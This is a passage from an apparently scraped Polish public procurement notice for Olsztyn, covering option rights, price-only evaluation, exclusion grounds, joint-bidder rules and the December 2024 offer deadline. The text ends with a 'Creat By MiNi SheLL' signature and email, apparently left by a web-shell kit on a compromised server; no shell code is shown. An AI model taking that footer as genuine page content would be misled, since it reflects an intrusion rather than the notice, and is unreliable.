dochodzenia jakichkolwiek roszczeń w stosunku do Zamawiającego,<br/>5) Zamówienie objęte prawem opcji Wykonawca będzie zobowiązany wykonać po uprzednim otrzymaniu pisemnego zawiadomienia od Zamawiającego, że zamierza skorzystać z prawa opcji, zawierającego informację o wysokości wartości zamówienia w ramach przedmiotowego uprawnienia zamawiającego,<br/>6) Zasady dotyczące realizacji zamówienia objętego prawem opcji będą takie same jak te, które obowiązywać będą przy realizacji zamówienia podstawowego, <br/>7) Zamawiający z prawa opcji może skorzystać kilkukrotnie, niezłożenie zlecenia przez Zamawiającego do 15.12.2025 r. oznacza rezygnację z prawa opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty, Zamawiający będzie się kierował kryterium ceny</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Oświadczenie wykonawcy, w zakresie art. 108 ust.1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2024 r. poz. 594 t. j. ), z innym wykonawcą, który złożył odrębną ofertę, oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 6 do SWZ;<br/>Zamawiający nie będzie żądał oświadczenia Wykonawcy, w zakresie art.108 ust 1. pkt.5 ustawy, o braku przynależności do tej samej grupy kapitałowej, jeżeli w prowadzonym postępowaniu wpłynie tylko jedna oferta.<br/><br/>2. Odpis lub informacja z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust.1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający nie stawia warunków udziału w postępowaniu.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w rozdziale VIII ust. 1 i 2 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnienie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnienie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które dostawy/ wykonają poszczególni Wykonawcy- załącznik nr 4 SWZ;<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści tej umowy, określone zostały w załączniku nr 7 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-27 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma Zamówień Publicznych Gminy Olsztyn</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-27 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com